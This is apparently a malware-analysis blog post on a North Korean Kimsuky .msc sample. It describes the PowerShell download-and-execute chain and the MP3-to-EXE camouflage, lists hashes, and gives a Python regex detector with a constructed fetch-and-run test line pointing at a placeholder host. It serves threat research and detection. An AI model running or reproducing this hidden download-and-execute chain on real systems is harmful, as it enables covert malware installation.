2024-09-10 Sakai @sakaijjang Malware created by Kimsuky: Terms and conditions (Terms of Use).msc (2024.9.6) – Kimsuky (North Korea) – Terms and Conditions.msc

by https://x.com/sakaijjang?lang=en 

Article translation in English 

More about Kimsuky: 2020-10-27 CISA North Korean Advanced Persistent Threat Focus

The malware is delivered as a file named “Terms and conditions.msc” containing embedded PowerShell commands. The PowerShell script is executed in a hidden window (-WindowStyle Hidden), preventing user awareness. The script uses Invoke-Expression (iex) to execute code and Invoke-WebRequest (iwr) to download a malicious script from hxxps://0x0(.)st/Xyl7(.)txt. The downloaded data, encoded in hexadecimal, is decoded into a byte array. The decoded data is initially saved as an MP3 file (e.g., vBqz.mp3) in the system’s public documents folder. The MP3 file is then renamed to an executable file (e.g., vBqz.exe), disguising the payload as a media file. The executable is run using conhost.exe in the background with the -NoNewWindow option, ensuring it remains hidden.

File Camouflage: The use of the MP3 extension initially disguises the executable file.
Stealthy Execution: Utilizing system utilities like conhost.exe and executing commands in hidden windows help evade user detection and security software.
Command-and-Control (C2) Infrastructure: The malware’s reliance on a public site for payload distribution suggests a flexible and easily reconfigurable C2 mechanism.
Hexadecimal Encoding: The use of encoded data indicates potential obfuscation techniques; decoding this data can reveal more about the malware.
Potential Variants: Different versions of this malware may exist, with variations in the payload or C2 URLs. Monitoring and updating detection rules, such as YARA, would be beneficial.
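The execution chain above (hidden window, iex, iwr, hex decode, MP3-to-EXE rename, conhost launch) can be matched as a combination rather than as single commands, which keeps false positives from ordinary admin scripts low. The detector below is an added example written for this page, not code from the author or from the sample; the script-block entries it scans are constructed, with a placeholder URL and elided steps, and the indicator regexes are assumptions about how the described commands would appear in PowerShell logging.

```python
import re

# Behaviours the write-up attributes to Terms and conditions.msc, expressed as
# regexes over PowerShell ScriptBlock text (e.g. Event ID 4104 / Sysmon Event 1).
INDICATORS = {
    "hidden_window":    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "iex_invoke":       re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web_download":     re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring)\b", re.I),
    "hex_decode":       re.compile(r"\[convert\]::tobyte\b|-split\s*['\"]\(\.\.\)['\"]", re.I),
    "media_ext_to_exe": re.compile(r"\.mp3\b.*?\.exe\b", re.I | re.S),
    "conhost_launch":   re.compile(r"conhost(?:\.exe)?\b.*?-nonewwindow", re.I | re.S),
}

# Any single indicator is common in legitimate scripts; the chain is what
# matters, so require several of them in the same script block.
MIN_HITS = 3


def match_indicators(script_block: str) -> list[str]:
    """Names of all indicators present in one script block, in table order."""
    return [name for name, rx in INDICATORS.items() if rx.search(script_block)]


def is_suspicious(script_block: str) -> bool:
    return len(match_indicators(script_block)) >= MIN_HITS


def scan(script_blocks: list[str]) -> list[tuple[int, list[str]]]:
    """Index and matched indicators for every block that crosses the threshold."""
    flagged = []
    for idx, block in enumerate(script_blocks):
        hits = match_indicators(block)
        if len(hits) >= MIN_HITS:
            flagged.append((idx, hits))
    return flagged


# Constructed sample log entries (not captured data): the first mimics the chain
# described above with a defanged placeholder URL and elided steps; the rest are benign.
SAMPLE_SCRIPT_BLOCKS = [
    'powershell -WindowStyle Hidden -c "iex (iwr hxxps://example.invalid/x.txt) ... '
    '[Convert]::ToByte($_,16) ... WriteAllBytes C:\\Users\\Public\\Documents\\vBqz.mp3 ... '
    'Rename-Item vBqz.mp3 vBqz.exe ... conhost.exe vBqz.exe -NoNewWindow"',
    "Invoke-WebRequest https://example.invalid/report.csv -OutFile report.csv",
    "powershell -WindowStyle Hidden -File C:\\Scripts\\nightly-backup.ps1",
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {idx}: {', '.join(hits)}")
```

Only the first constructed entry crosses the threshold; the two benign entries each trip a single indicator and are ignored.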

Download. Email me if you need the password scheme.
File Information
Name: Terms and conditions.msc
Size: 141 KB
MD5: 81d224649328a61c899be9403d1de92d
SHA-1: f4895809cb38fa1f225340e99c05e477a5017111
SHA-256: cea22277e0d7fe38a3755bdb8baa9fe203bd54ad4d79c7068116f15a50711b09
Malware Repo Links
Over the past 15 years, as the blog has been around, many hosting providers have dropped support due to stricter no-malware policies. This has led to broken links, especially in older posts. If you find a broken link on contagiodump.blogspot.com (or contagiominidump.blogspot.com), just note the file name from the URL and search for it in the Contagio Malware Storage.

Article Link: contagio: 2024-09-10 KIMSUKY (North Korean APT) Sample (Sakai @sakaijjan – Terms and Conditions.msc)


